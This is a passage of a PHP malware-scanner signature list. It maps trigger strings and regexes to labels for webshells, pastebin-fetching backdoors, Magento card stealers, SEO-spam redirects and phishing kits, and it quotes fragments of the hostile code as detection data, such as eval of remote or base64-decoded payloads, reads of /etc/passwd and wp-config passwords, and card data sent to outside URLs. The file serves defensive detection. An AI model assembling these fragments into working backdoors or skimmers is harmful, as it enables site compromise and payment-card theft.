				'{@chmod($' => array(STR_TRIGGER,
					'))!=hash(\'sha1\',file_get_contents($' => array(STR_CLEARFILE, 'php.backdoor.file_get_contents.052', NULL),
				),
	
				'Z2V0X2NvbnRlbnRzKGJhc2U2NF9kZWNvZG' => array(STR_CLEARFILE, 'php.malware.injector.073', NULL),
				'$results[] = array( \'code\' => \'OK\', \'msg\' => "Directory $dir is writable" );' => array(STR_CLEARFILE, 'php.hacktool.mailer.152', NULL),
			),
	
			'http://pastebin.com/raw' => array(STR_TRIGGER,
		
				'fwrite($' => array(STR_TRIGGER,
		
					'file_get_contents("http://pastebin.com/raw' => array(STR_TRIGGER,
		
						'if(array_keys($_GET)[' => array(STR_TRIGGER,
							'if($content){unlink(' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.pastebin_uploader.008', 'if\(array_keys\(\$_GET\)\[[\d]+\][\s]*==[\s]*.up.\)\{[\s]*\$content = file_get_contents\(.http:..pastebin[^}]+\}[\s]*\}[\s]*else[\s]*\{[\s]*print[\s]*.[\w]+.;[\s]*\}'),
						),
	
						'fopen(\'/etc/passwd' => array(STR_TRIGGER,
							'>Automatic cPanel Cracker<' => array(STR_CLEARFILE, 'php.hacktool.cpanel_bruteforce.012', NULL),
						),
		
						'=getcwd();' => array(STR_TRIGGER,
							'= @file_get_contents("http://pastebin.com/raw/' => array(STR_CLEARFILE, 'php.backdoor.pastebin_uploader.004', NULL),
						),
	
						'@symlink' => array(STR_TRIGGER,
							'scandir($path);' => array(STR_CLEARFILE, 'php.backdoor.pastebin_uploader.010', NULL),
						),
						
						'disable_functions' => array(STR_TRIGGER,
							'$body=("Shell: http' => array(STR_CLEARFILE, 'php.backdoor.webshell.187', NULL),
						),
	
						'$resultsx = file_get_contents' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.backdoor_installer.010', '(?:\/\*\*\s*\* Name\s*: Magento Small Bug [^{<]+?\*\/\s*)?\$resultsx\s*=\s*file_get_contents\(.http...pastebin[^\)]+\);\s*if.\s*\$resultsx[^\}]+n";(?:\s*\}){3}\s*(?:\$msg \.= "[^(]+)?mail\("[^\)]+\);(?:\s*\$locate\s*=[^;]+";\s*if[^\)]+\)\s*\)\s*\{[^\}]+\}\s*else\s*\{[^\}]+fclose.\$\w+\);\s*\}|\s*\$websites = Mage::app..->getWebsites..;[^;]+;\s*.params.._store.. = .code;)?|echo \$username\.\$password;exit\(\);'), //order with pastebin_uploader.008 matters! by PG
						'$usercp = explode("\r\n", $_POST[\'user_cp\']);' => array(STR_CLEARFILE, 'php.backdoor.pastebin_uploader.009', NULL), //must be placed prior to pastebin_uploader.002
						'file_get_contents("http://pastebin.com/raw' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.pastebin_uploader.002', '\\$[\\w]+[\\s]*=[\\s]*file_get_contents..http:..pastebin.com.raw[^;]+;[\\s]*\\$[\\w]+[\\s]*=[\\s]*fopen..[^;]+;[\\s]*fwrite[^;]+;[\\s]*fclose[^;]+;'),
					),
		
					'function inf' => array(STR_TRIGGER,
						'function shell' => array(STR_TRIGGER,
							'pastebin.com/raw.php?' => array(STR_CLEARFILE, 'php.hacktool.shell-uploader.005', NULL),
						),
					),
		
					'>Mr.Dr3awe' => array(STR_CLEARFILE, 'php.backdoor.pastebin_uploader.007', NULL), //order matters! should preceed following pastebin sig!
				),
		
				'<?php die(eval(file_get_contents("http://pastebin.com/raw.php?i=' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.pastebin_uploader.005', 'die\(eval\(file_get_contents\("http:\/\/pastebin\.com\/raw\.php\?i=[^;]+?;'),
				'base64_decode(file_get_contents("http://pastebin.com' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.pastebin_uploader.012', '\$[\w]+[\s]*=[\s]*base64_decode\(file_get_contents\(.http[^$]+\$[\w]+[\s]*=[\s]*file_put_contents\(\$_SERVER\[.DOCUMENT_ROOT.\][^\}]+\}else\{[\s]*\$[\w]+[\s]*=[\s]*[^;]+;[\s]*\}'),
				'eval(str_rot13(gzinflate(str_rot13(base64_decode(($' => array(STR_CLEARFILE, 'php.backdoor.file_get_contents.046', NULL),
				'ploit<' => array(STR_CLEARFILE, 'php.backdoor.pastebin_uploader.003', NULL), //order matters! should preceed following pastebin sigs!
			), 
	
			'echo file_' => array(STR_TRIGGER,
				'$_POST[\'cmd\'])); } else echo "echo file_get_contents(\'/etc/passwd' => array(STR_CLEARFILE, 'php.exploit.sysinfo.007', NULL),
				'echo file_get_contents(system_news_path().$uri); die;' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.102', 'function system_news_idn[^}]+\}[^}]+}[\s]*}[\s]*function system_news_path\(\)[\s]*\{[\s]*return[^}]+}[\s]*if[\s]*\(!empty\(\$_POST..ssynewid[^}]+}[\s]*\$uri[^}]+die;[\s]*}[\s]*(function newsidncallback[^?]+ob_start\(.newsidncallback.\);)?'),
				'echo file_get_contents(\'1x1.gif\',FILE_BINARY);' => array(STR_CLEARFILE, 'php.spam-seo.redirect.010', NULL),
				'bot|spider|wget/i\',$_SERVER[\'HTTP_USER_AGENT' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector_gen.043', 'if\s*\(\s*preg_match\s*\(\s*[\'"]\/Google\s*Web\s*Preview\s*\|\s*bot\|\s*spider\|wget\/i[\'"]\s*,\s*\$_SERVER\[[\'"]HTTP_USER_AGENT[\'"]\]\s*\)\s*\)\s*{\s*echo\s*file_get_contents\([\'"]http(?:s)?:\/\/[^\)]+\)\s*;\s*}'),
				'filemtime($target)) {$string = file_get_contents($source);$result = file_put_contents($target, $' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.doorway_downloader.028', 'error_reporting\([^\)]\)\s*;\s*ini_set\s*\(.display_errors.,\s*0\s*\)\s*;\s*(\$\w+)\s*=\s*\$_SERVER\[.HTTP_HOST.\]\s*;\s*\1\s*=\s*str_replace\(.\&.,\s*[\'"]{2},\s*\1\s*\)\s*;\s*(\$\w+)\s*=\s*dirname\(__FILE__\)\s*\.\s*DIRECTORY_SEPARATOR\s*\.\s*[^\2]+(\$\w+)\s*=\s*[\'"]https?:\/\/[^\1]+\1;\s*if\s*\(\(file_exists\(\2\)\)\s*\&\&\s*\(time\(\)\s*-[^{]+{\s*(\$\w+)\s*=\s*file_get_contents\(\3\)\s*;\s*\$\w+\s*=\s*file_put_contents\(\2,\s*\4\s*\)\s*;\s*}\s*echo\s*file_get_contents\(\2\)\s*;'),
				'<\?php[\s]*echo[\s]*file_get_contents\(.https?:[^\?;]+\?url=.[\s]*\.\$_SERVER\[.HTTP_HOST.\][\s]*\.[\s]*\$_SERVER\[.REQUEST_URI.\]\);' => array(REX_CLEAR_LINEMATCH, 'php.spam-seo.injector.292', 'echo[\s]*file_get_contents\(.https?:[^\?;]+\?url=.[\s]*\.\$_SERVER\[.HTTP_HOST.\][\s]*\.[\s]*\$_SERVER\[.REQUEST_URI.\]\);'),
				'@ini_set\(.display_errors[^:]+file_get_contents\([^&]+\$_SERVER\[.REMOTE_ADDR.\]\.[^;]+str_replace' => array(REX_CLEAR_MULTIMATCH, 'php.spam-seo.injector.313', '@ini_set\(.display_errors[^:]+file_get_contents\([^&]+\$_SERVER\[.REMOTE_ADDR.\]\.[^;]+str_replace\(.[\s]*.,[\s]*.%20.,\$_SERVER\[.HTTP_USER_AGENT.\]\)\);'),
				'if($_GET)$umbr[\'get\'] = $_GET;' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.generic.086', 'function [^)]*\)\s+\{\s+foreach.\(array\(\'HTTP_REAL_IP\',.\'HTTP_X_REAL_IP[^:]*:\/\/input\'\);\s+if\(\$_GET\)\$\w+\[\'get\'\].=.\$_GET;[^)]*?\);\s+echo.file_get_contents\(\'http[^;]*?;'),
				'echo file_get_contents(\'index.html.' => array(STR_CLEAR_LINEMATCH, 'php.malware.include.068', 'echo file_get_contents\(.index\.html\.[^;]+\);'),
				'if(!isset($_COOKIE[\'adminhtml\'])) echo file_get_contents($_SERVER[\'DOCUMENT_ROOT\'].' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-cc-stealer.126', 'if[\s]*\(\$_SERVER\[.REQUEST_METHOD.\][\s]*===[\s]*.GET.\)[\s]*\{[\s]*if[\s]*\(strpos\(\$_SERVER[^\{]+\{[\s]*if[\s]*\(!isset\(\$_COOKIE\[.adminhtml[^\}]+\}[\s]*\}'),
				'&& (strpos($_SERVER[\'HTTP_USER_AGENT' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.file_get_contents.055', 'if[\s]*\(\$_SERVER\[.REQUEST_URI.\][\s]*==[^\]]+strpos\(\$_SERVER\[.HTTP_USER_AGENT.\],[\s]*.[\w]+.\)[\s]*===[\s]*false\)[^\}]+echo[\s]*file_get_contents\(.http[^\)]+\);[\s]*\}[\s]*\}'),
			),
	
			'eval($' => array(STR_TRIGGER,
	
				'.txt";' => array(STR_TRIGGER,
					'header("Content-type:' => array(STR_TRIGGER,
						'@file_get_contents($' => array(STR_TRIGGER,
							'txt";[\s]*\$[\w]+[\s]*=[\s]*@file_get_contents[^;]+;[\s]*eval' => array(REX_CLEAR_MULTIMATCH, 'php.backdoor.file_get_contents.028', 'header\("Content[^)]+\);[\s]*\$[\w]+[\s]*=[\s]*.http[^;]+txt";[\s]*\$[\w]+[\s]*=[\s]*@file_get[^;]+;[\s]*eval\(\$[\w]+\);'),
						),
					),
				),
	
				'$auth_pass' => array(STR_TRIGGER, 
					'\$auth_pass\s*=\s*.\w+.\s*;\s*\$\w+\s*=\s*file_get_contents\([^\)]+\)\s*;\s*eval\(\$\w+\)\s*;' => array(REX_CLEAR_MULTIMATCH, 'php.backdoor.file_get_contents.023', '(?:\$\w+\s*=\s*urldecode\(\$_GET\[.\w+.\]\s*\)\s*;\s*)?\@ini_set\([^\)]+\)\s*;\s*\@ini_set\([^\)]+\)\s*;\s*\$auth_pass\s*=\s*.\w+.\s*;\s*\$\w+\s*=\s*file_get_contents\([^\)]+\)\s*;\s*eval\(\$\w+\)\s*;'),
				),
	
				'echo("<center>Domain Reseller' => array(STR_TRIGGER,
					'[\'password\'], $cc_encryption_hash);' => array(STR_CLEARFILE, 'php.hacktool.configuration_stealer.016', NULL),
				),
	
				'<\?php\s*(\$\w+)\s*=\s*file_get_contents\(__FILE__\)\s*;\s*\1\s*=\s*base64_decode\(substr\(\1,\s*-?\d+\)\s*\)\s*;\s*\1\s*=\s*gzuncompress\(\1\)\s*;\s*eval\(\1\)\s*;\s*die\(\)\s*;\s*\?>\s*[a-zA-Z0-9\+\/]+' => array(REX_CLEARFILE, 'php.backdoor.eval_file_get_contents.003', NULL),
				'= "base64_decode";' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_file_get_contents.004', '\$[\w]+[\s]*=[\s]*[^;]+;[\s]*\$[\w]+[\s]*=[\s]*[^;]+;[\s]*\$[\w]+[\s]*=[\s]*[^;]+;[\s]*@?file_put_contents\(\$[\w]+,.<\?php[\s]*.\.\$[\w]+\(@?file_get_contents\(\$[\w]+\)\)\);[\s]*include\(\$[\w]+\);[\s]*@?unlink\(\$[\w]+\);[\s]*@?eval\(\$[\w]+\(@?file_get_contents\(\$[\w]+\)\)\);'),
				'function r_action_removeshell() { if (file_exists' => array(STR_CLEARFILE, 'php.backdoor.webshell.164', NULL),
				'header\([^$]+\$[\w]+=base64_decode\([^;]+\);\$[\w]+[\s]*=[\s]*\@file_get_contents\(\$[\w]+\);' => array(REX_CLEAR_MULTIMATCH, 'php.backdoor.file_get_contents.037', 'header\(.[\w]+[^$]+\$[\w]+=base64_decode\(.[\w]+.\);\$str[\s]*=[\s]*\@file_get_contents\(\$[\w]+\);[\s]*eval\(\$[\w]+\);'),
				'$php); eval($php); } function curl(' => array(STR_CLEARFILE, 'php.backdoor.file_get_contents.038', NULL),
				');$php=@base64_decode($b64);if($php){eval($php);}else{unlink(__FILE__);}}' => array(STR_CLEARFILE, 'php.malware.obfuscated.038', NULL),
			),
	
			'$tiaourl =' => array(STR_TRIGGER,
				'google' => array(STR_TRIGGER, 
	
					'function get_url' => array(STR_TRIGGER,
	
						'function get_url_con($con' => array(STR_TRIGGER,
							'<\?php[\s]*\$[\w]+[\s]*=[\s]*strtolower\(\$_SERVER\[.HTTP_REFERER.\]\);[\s]*if[\s]*\(strpos' => array(REX_CLEAR_MULTIMATCH, 'php.spam-seo.tiaourl_doorway.005', '\$[\w]+[\s]*=[\s]*strtolower\(\$_SERVER\[.HTTP_REFERER.\]\);[\s]*if[\s]*\(strpos[\s]*\(\$[\w]+[^\{]+\{[\s]*\$tiaourl[^@]+return @file_get_contents\([^}]+[\s\}]+'),
						),
	
						'@strtolower($_SERVER' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.tiaourl_doorway.004', 'error_reporting\([^;]+;[\s]*[^{]+tiaourl[\s]*=[^}]+\}[\s]*if[\s]*\(\$_SERVER\[.REQUEST_URI[^>]+location:[\s]*.[\s]*\.[\s]*\$tiaourl\);[\s]*exit;[\s]*\}[\s]*\}[\s]*else[\s]*\{[\s]*echo[^\$]+function get_url[^@]+@file_get_contents[^}]+[\s\}]+'),
					),
	
					'$ksite = !empty' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.tiaourl_doorway.002', '(\$links[\s]*=[\s]*<<<EOF[^{]+EOF;[\s]*)?\$tmp[\s]*=[\s]*strtolower\(\$_SERVER\[.HTTP_USER_AGENT.\]\)\;[^&]+&nbsp[^@]+location:[\s]*[\'"\.\s]+\$tiaourl\);[^}]+}[\s]*([^\?]*\})?'),
					'$tiaourl = file_get_contents("http:' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.tiaourl_doorway.003', '<\?php\s*(?:error_reporting\([^\)]+?\);\s*)?\$tiaourl = file_get_contents.+header\("location: "\s*\.\s*\$tiaourl\);.+?\?>'),
				),
			),
	
			'explode(' => array(STR_TRIGGER,

				'header(' => array(STR_TRIGGER,
					'\$[\w]+[\s]*=[\s]*(file_get_contents\()?.http[^;]+\)?;[\s]*\$[\w]+[\s]*=[^\|]explode\([^\(]+header\(.Location:[^;]+\);' => array(REX_CLEAR_MULTIMATCH, 'php.backdoor.file_get_contents.051', '\$[\w]+[\s]*=[\s]*(file_get_contents\()?.http[^;]+\)?;[\s]*\$[\w]+[\s]*=[^\|]explode\([^\(]+header\(.Location:[^;]+\);'),
					'"ABSA |' => array(STR_CLEARFILE, 'php.phishing.absa.001', NULL),
					')) == "http://" || (mb_substr($' => array(STR_CLEAR_MULTIMATCH, 'php.malware.redirect.044', 'if\(\(!empty\(\$_SERVER\[.HTTP_REFERER.\]\)[\s]*&&[\s]*strpos\(\$_SERVER\[.PHP_SELF.\],[^;]+;[\s]*\$[\w]+[\s]*=[\s]*array\(.[\w]+.,.[\w]+.\);[\s]*if[\s]*\([\s]*isset\([\s]*\$_SERVER\[.HTTP_X_FORWARDED_FOR.\][\s]*\)[\s]*\)[\s]*\{[\s]*\$[\w]+[\s]*=[\s]*explode\([^\}]+\}[\s]*\$[\w]+[^|]+\|\|[\s]*\(mb_substr\(\$[\w]+,[\d]+,[\d]+\)\)[\s]*==[\s]*.http[^\}]+header\(.Location:[\s]*..\$[\w]+\);[\s]*exit\(\);[\s]*\}[\s]*\}'),
				),
	
				'function send_rms_curl_request(' => array(STR_CLEARFILE, 'php.backdoor.wp-admin_bypass.010', NULL),
			),
	
			'hex2bin' => array(STR_TRIGGER,

				'case (strpos($' => array(STR_TRIGGER,
					'$json = json_decode(hex2bin($file));' => array(STR_CLEAR_MULTIMATCH, 'php.malware.redirect.045', 'function[\s]*[\w]+\(\)[\s]*\{[\s]*\$[\w]+[\s]*=[\s]*file_get_contents\([^\{]+\{[\s]*case[\s]*\(strpos\(\$[\w]+[^\}]+\}[\s]*if\(\$[\w]+[\s]*==[\d]+\)[\s]*\{[\s]*if\(\$[\w]+->[\w]+\)[\s]*\{[\s]*\$[\w]+[\s]*=[\s]*\$_SERVER\[.REQUEST_URI.\];[^\}]+\}.\);[\s]*exit;[\s]*\}[\s]*else[\s]*\{[\s]*header\([^\}]+\}..\);[\s]*exit;[\s]*\}[\s]*\}[\s]*\}[\s]*\}[\s]*[\w]+\(\);'),
				),

				'{@file_get_contents(hex2bin($pvar).$_GET[\'p\'].\'&h=\'.$_GET[\'h\']);exit;}' => array(STR_CLEARFILE, 'php.backdoor.uploader.374', NULL),
				'@file_put_contents($tmp,file_get_contents(hex2bin' => array(STR_CLEARFILE, 'php.backdoor.uploader.374.02', NULL),
                'foreach ( array(\'.\', \'..\', \'../..\', \'../../..\', \'../../../..\', \'../../../../..\', \'../../../../../..\', \'../../../../../../..\', \'../../../../../../../..\') AS' => array(STR_CLEARFILE, 'php.malware.wpnull.001', NULL),
                'hex2bin( \'687474703a2f2f636f6e6e6563742e61706965732e6f72672f\'' => array(STR_CLEARFILE, 'php.malware.wpnull.001.02', NULL),
			),

			'getQuote()' => array(STR_TRIGGER,

				'json_decode(file_get_contents(' => array(STR_TRIGGER,
					'mail(' => array(STR_TRIGGER,
						'if (strlen($' => array(STR_TRIGGER,
							'$send = array(' => array(STR_CLEAR_MULTIMATCH, 'php.malware.cc_stealer.025', '\$[\w]+[\s]*=[\s]*\$[\w]+[\s]*->[\s]*getQuote\(\)[\s]*->[\s]*getBillingAddress\(\)[\s]*->[\s]*getEmail\(\);[\s]*\$[\w]+[\s]*=[\s]*array\([^;]+trim\(\$_SERVER\[.SERVER_NAME.\]\)\);[^;]+;[\s]*\$[\w]+[\s]*=[\s]*json_decode\(file_get_contents\([^\}]+\}[\s]*else[\s]*\{[\s]*\$[\w]+[^\{]+if[\s]*\(strlen\(\$[\w]+\)[\s]*>[\s]*9\)[\s]*\{[\s]*foreach\(\$[\w]+[^@]+mail\(.[\w]+@[^;]+\$[\w]+[\s]*,[\s]*\$[\w]+\);[\s]*\}'),
						),
					),
				),

				'stream_context_create(array(' => array(STR_TRIGGER,
					'=>@$_REQUEST[' => array(STR_TRIGGER,
						'Magento\Checkout\Model\Cart' => array(STR_CLEARFILE, 'php.malware.cc_stealer.027', NULL),
					),
				),
			),

			'trim(base64_decode(' => array(STR_TRIGGER,
	
				'function decrypt_str($str)' => array(STR_TRIGGER,
					'function find_uri_ltp_val_file($req_uri)' => array(STR_TRIGGER,
						'function find_secret_dir($root' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.doorway-gen.046.14', '\$\{"[^\}]*\\\\x[^\}]+\}\["[^\]]+\\\\x[^\]]+\]="[^"]+";[^\n]+exit\(\$\{\$[^\}]+\}(\[[^\]]+\]\})?\);[\}]+'),
					),
				),
	
				'array(\'app/Mage.php\',\'lib/Varien/Autoload.php' => array(STR_TRIGGER,
					'@file_put_contents(\'/tmp' => array(STR_CLEARFILE, 'php.malware.magento-cc-stealer.077', NULL),
				),
			),
	
			'(isset($_GET[\'do\']))' => array(STR_TRIGGER,
				'if (strlen($file_contents) < 10 && function_exists(\'curl_init' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.file_get_contents.013', 'function [\w]+\(\$url\)[\s]*\{[\s]*\$file_contents[\s]*=[\s]*..;[\s]*\$real_user_agent[^>]+@eval\(\$code\);[\s]*}'),
				'elseif($toolsname === "idxconfig' => array(STR_CLEARFILE, 'php.backdoor.webshell.099', NULL),
			),
	
			'0777 & fileperms($' => array(STR_TRIGGER,
				'function smartscan($dir) {' => array(STR_CLEARFILE, 'php.spam-seo.injector.209', NULL),
				'= \'# \* @category \s*Mage#\';' => array(STR_CLEARFILE, 'php.malware.injector.058', NULL),
			), 
	
			'$II' => array(STR_TRIGGER,
				'](\'ZGlzcGxheV9lcnJvcnM=\'),$GLOBALS' => array(STR_CLEARFILE, 'php.backdoor.uploader.133', NULL),
				'eval(base64_decode(\'JElJSUlJSUlJSWxsbD0nY3VybF9jbG9zZ' => array(STR_CLEARFILE, 'php.backdoor.uploader.210', NULL),
			),
	
			'${"' => array(STR_TRIGGER,
				'file_get_contents(${${"' => array(STR_TRIGGER,
					'urlencode($_' => array(STR_TRIGGER,
						'\$\{"(G|.x47)(L|.x4c)(O|.x4f)(B|.x42)(A|.x41)(L|.x4c)(S|.x53)"\}\["[^"]+"\][\s]*=[\s]*"[^"]+";[\s]*\$\{"(G|.x47)(L|.x4c)(O|.x4f)(B|.x42)(A|.x41)(L|.x4c)(S|.x53)"\}\["[^"]+"\][\s]*=[\s]*"[^"]+";[\s]*[^\n]+\}' => array(REX_CLEAR_LINEMATCH, 'php.malware.GLOBALS.008', '\$\{"(G|.x47)(L|.x4c)(O|.x4f)(B|.x42)(A|.x41)(L|.x4c)(S|.x53)"\}\["[^"]+"\][\s]*=[\s]*"[^"]+";[\s]*\$\{"(G|.x47)(L|.x4c)(O|.x4f)(B|.x42)(A|.x41)(L|.x4c)(S|.x53)"\}\["[^"]+"\][\s]*=[\s]*"[^"]+";[\s]*[^\n]+\}[\s]*((if\(!empty\(\$_POST\[[^\]]+\]\)[\s]*&&[\s]*function_exists[^;]+\);)|(@?touch[^;]+\);))?'),
					),
				),
			),
	
			'/ID3/module.dat' => array(STR_TRIGGER,
				'FILE_APPEND' => array(STR_TRIGGER,
					'curl_exec' => array(STR_TRIGGER,
						'<= 77700 || filesize' => array(STR_CLEARFILE, 'php.backdoor.file_get_contents.045', NULL),
					),
				),
			),

			'$id=base64_encode(' => array(STR_TRIGGER,
				'file_get_contents($url, false, $context);' => array(STR_TRIGGER,
					'$data=base64_encode(serialize(array(\'request\'=>$_REQUEST,\'ip\'=>$_SERVER[\'REMOTE_ADDR\'],\'ua' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-cc-stealer.051.02', '(error_reporting.0.;[\\s]*)?\\$id=base64_encode[^;]+;[\\s]*\\$url=[^;]+;[\\s]*if.!isset.._COOKIE[^{]+\\{[\\s]*\\$rand=rand[^>]+\\$data=base64_encode.serialize.array..request...\\$_REQUEST..ip[^;]+;[\\s]*\\$[\\w]+[\\s]*=[\\s]*array..http[^;]+data\\)\\)\\)\\);[\\s]*\\$context[^;]+;[\\s]*file_get_contents..url[^;]+context\\);'),
				),
			),
	
			'$source = file_get_contents($dn);' => array(STR_TRIGGER,
				'$url = htmlspecialchars(trim($_GET[\'url\']));' => array(STR_TRIGGER,
					'$dn=($url).($patch);' => array(STR_CLEARFILE, 'php.backdoor.file_get_contents.010', NULL),
				),
			),
	
			'"){eval($' => array(STR_TRIGGER,
				');exit;}' => array(STR_TRIGGER,
					'txt");if($_GET' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_gen.008', '\$[\w]+[\s]*=[\s]*file_get_contents[^;]+txt..;if\(._GET[^{]+\{eval.\$[\w]+\);exit;}'),
				),
			),
	
			'curl_get_from_webpage($' => array(STR_TRIGGER,
				'curl_get_from_webpage_one_time($url,$proxy' => array(STR_CLEARFILE, 'php.backdoor.uploader.070', NULL),
			),
	
			'file_get_contents(\'wp-config.php\');' => array(STR_TRIGGER,
				'detect_define(\'DB_PASSWORD\'' => array(STR_CLEARFILE, 'php.hacktool.wp_users.001', NULL),
			),
	
			'dolly_' => array(STR_TRIGGER,
				'OtherFunctions::returnIfIsset(@' => array(STR_CLEARFILE, 'php.phishing.dolly_landings_tool.001', NULL),
			),
	
			'select * from ".$prefix."options where option_name=\'siteurl\'' => array(STR_TRIGGER,
				'update[\s]*.\.\$prefix\..users[\s]*set[\s]*user_login[\s]*=[\s]*.[\w]+.[\s]*,user_pass[\s]*=[\s]*.[\w]+..\);' => array(REX_CLEARFILE, 'php.backdoor.wp_adminadd.008', NULL),
			),
	
			'$marker = "cde:::";' => array(STR_TRIGGER,
				'function check_image_c()' => array(STR_CLEARFILE, 'php.backdoor.pregreplace.021', NULL),
			),
	
			'$testgo = "$site$testencoded";' => array(STR_TRIGGER,
				'explode("@",$_REQUEST[' => array(STR_CLEARFILE, 'php.phishing.microsoft.004', NULL),
			),
	
			'strrev(str_replace(\'^\',\'=\',substr($' => array(STR_TRIGGER,
				'= implode(array_map(\'chr\',array(98,97,115,101,54,52,95,100,101,99,111,100,101)' => array(STR_CLEARFILE, 'php.backdoor.uploader.251', NULL),
			),
	
			'@$_SERVER[base64_decode(\'SFRUUF9BQ0NFUFRfTEFOR1VBR0U=\')];' => array(STR_TRIGGER,
				'=base64_decode(\'Zmdj\');}else{if(function_exists(base64_decode(\'Y3VybF9pbml0\')))$' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.redirect.107', '\$[\w]+=@\$_SERVER\[base64_decode\(.SFRUU[^\n]+\}'),
			),
	
			'.urlencode(strtolower($_SERVER[' => array(STR_TRIGGER,
				'@socket_create(AF_INET' => array(STR_CLEARFILE, 'php.malware.redirect.025', NULL),
			),
	
			'.urlencode($' => array(STR_TRIGGER,
				'if(isset($_POST[\'Card_Number\']) &&' => array(STR_CLEAR_MULTIMATCH, 'php.malware.cc_stealer.011', 'if\(isset\(\$_POST\[.Card_Number.\]\)[\s]*&&[\s]*\$_POST[^;]+;[\s]*file_get_contents\(.http[^;]+urlencode\(\$[\w]+\)\);\}'),
			),
	
			'google|bing|yandex|baidu|yahoo|duckduckgo|ask' => array(STR_TRIGGER,
				'header("Location: ".' => array(STR_CLEAR_MULTIMATCH, 'php.malware.redirect.036', '\$\w+.=.file_get_contents\(\"http[^;]*;\s+\$\w+.=.\'google\|bing\|yandex\|baidu\|yahoo\|duckduckgo\|ask\';if\(isset\(\$_SERVER\[\'HTTP_REFERER\']\)\)[^L]*Location:.".\$\w+.""\);\}\}'),
			),
			
			'eval ("?>".' => array(STR_TRIGGER,
				'base64_decode($' => array(STR_CLEARFILE, 'php.malware.dropper.043', NULL),
			),
	
			'preg_match("/(Googlebot|bingbot)(?:' => array(STR_TRIGGER, 
				'$movedb = user_min_browser($_SERVER[\'HTTP_USER_AGENT\']);' => array(STR_CLEARFILE, 'php.spam-seo.injector.131', NULL),
			),
		
			'function Reads($url){' => array(STR_TRIGGER,
				'if(empty($html)){"<p align=\'center\'><font color=\'red\'>' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.020', NULL),
			),
	
			'if (!defined(\'PCLZIP_READ_BLOCK_SIZE\'))' => array(STR_TRIGGER,
				'file_put_contents($id,' => array(STR_CLEARFILE, 'php.dropper.pclzip.001', NULL),
			),
	
            '@json_decode(file_get_contents(' => array(STR_TRIGGER,
                '_cc_' => array(STR_CLEARFILE, 'php.malware.cc_stealer.029', NULL),
            ),

			'where uid %3D \'1\';#]=FcUk&name[]=Crap&pass=test&form_' => array(STR_CLEARFILE, 'php.hacktool.drupal_exploit_group.001', NULL),
			'if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ."' => array(STR_CLEARFILE, 'php.backdoor.webshell_group.001', NULL),
			'$data=file_get_contents("php://input");echo`$data`;' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.generic.055', '\\$data=file_get_contents\\(\"php:..input\"\\);echo`\\$data`;'),
			'$res[] = file_get_contents(\'php://input\');' => array(STR_CLEARFILE, 'php.backdoor.uploader.029', NULL),
			'* plugin_googlemap2_proxy.php,v ' => array(STR_CLEARFILE, 'php.hacktool.googler.003', NULL),
			'$get = @file_get_contents("$tar/?q=user/login");' => array(STR_CLEARFILE, 'php.hacktool.drupal_pwn.001', NULL),
			'$credit=file_get_contents'=> array(STR_CLEAR_MULTIMATCH,'php.spam-seo.generic.005','\$credit\s*=\s*file_get_contents[^>]+echo\s*\$credit;'),
			'file_get_contents("http://".$_SERVER[\'HTTP_HOST\']."/includes/js/k4yrR.txt");' => array(STR_CLEARFILE, 'php.malware.generic.042', NULL),
			"\'SYSTEM_LOGIN\', \'support@wordpress.org\'" => array(STR_CLEARFILE, 'php.backdoor.wpsystemlogin.001', NULL),
			'/sym/root".$' => array(STR_CLEARFILE, 'php.malware.adinjection.001', NULL),
			'$image = "101 118 97 108' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.pregreplace.009.02', 'function ([\w]+\(\))[\s]*\{[\s]*\$imagepath[\s]*=[\s]*array[\s]*\([^)]+\);[\s]*\$imagepath[\s]*=[\s]*implode\(..,[\s]*array_map\(.chr.,[\s]*explode\([^\*]+\*.e.,[\s]*\$image[^\}]+}[\s]*\1;'),
			'QAIAPD9waHAgABEkY29sb3IgPSAAACIjZGY1IjsgICRkZWZhdWwAgHRf' => array(STR_CLEARFILE, 'php.backdoor.filesman.051', NULL),
			'function check_acc($login,$pass,$serv,$port)' => array(STR_CLEARFILE, 'php.hacktool.bruteforce.004', NULL),
			'GetFileInfo($_POST[\'file\'],$_POST[\'isroot\']);' => array(STR_CLEARFILE, 'php.hacktool.generic.005', NULL),
			'$tab = $tablets[rand(0, count($tablets))]; echo' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.081', NULL),
			'/s.php?mesaj=$mes' => array(STR_CLEARFILE, 'php.phishing.redirect.031', NULL),
			'find_secret_dir($root)' => array(STR_CLEARFILE, 'php.backdoor.file_get_contents.034', NULL),
			'if(wp_admin_bar_dl("http' => array(STR_CLEARFILE, 'php.backdoor.file_get_contents.036', NULL),
			'function upload($upfile,$ndir,$unzip,$delzip) {' => array(STR_CLEARFILE, 'php.backdoor.webshell.185', NULL),
			'if(strpos($key,\'baidu\')!==false||strpos($key,\'sogou\')!==false||strpos($key,\'360\')!==false)' => array(STR_CLEAR_MULTIMATCH, 'php.malware.redirect.034', '\$\w+=.\$_SERVER\[\"HTTP_USER_AGENT\"\];\s+if\((strpos\(\$\w+,\'\w+\'\)\!==false\|\|){1,2}strpos\(\$\w+,\'360\'[^.]*(.\w+){1,5}\.jpg\'\);.echo..\w+;.exit;.[^}]*\}'),
			'file_get_contents($shell);' => array(STR_CLEARFILE, 'php.backdoor.uploader.389', NULL),
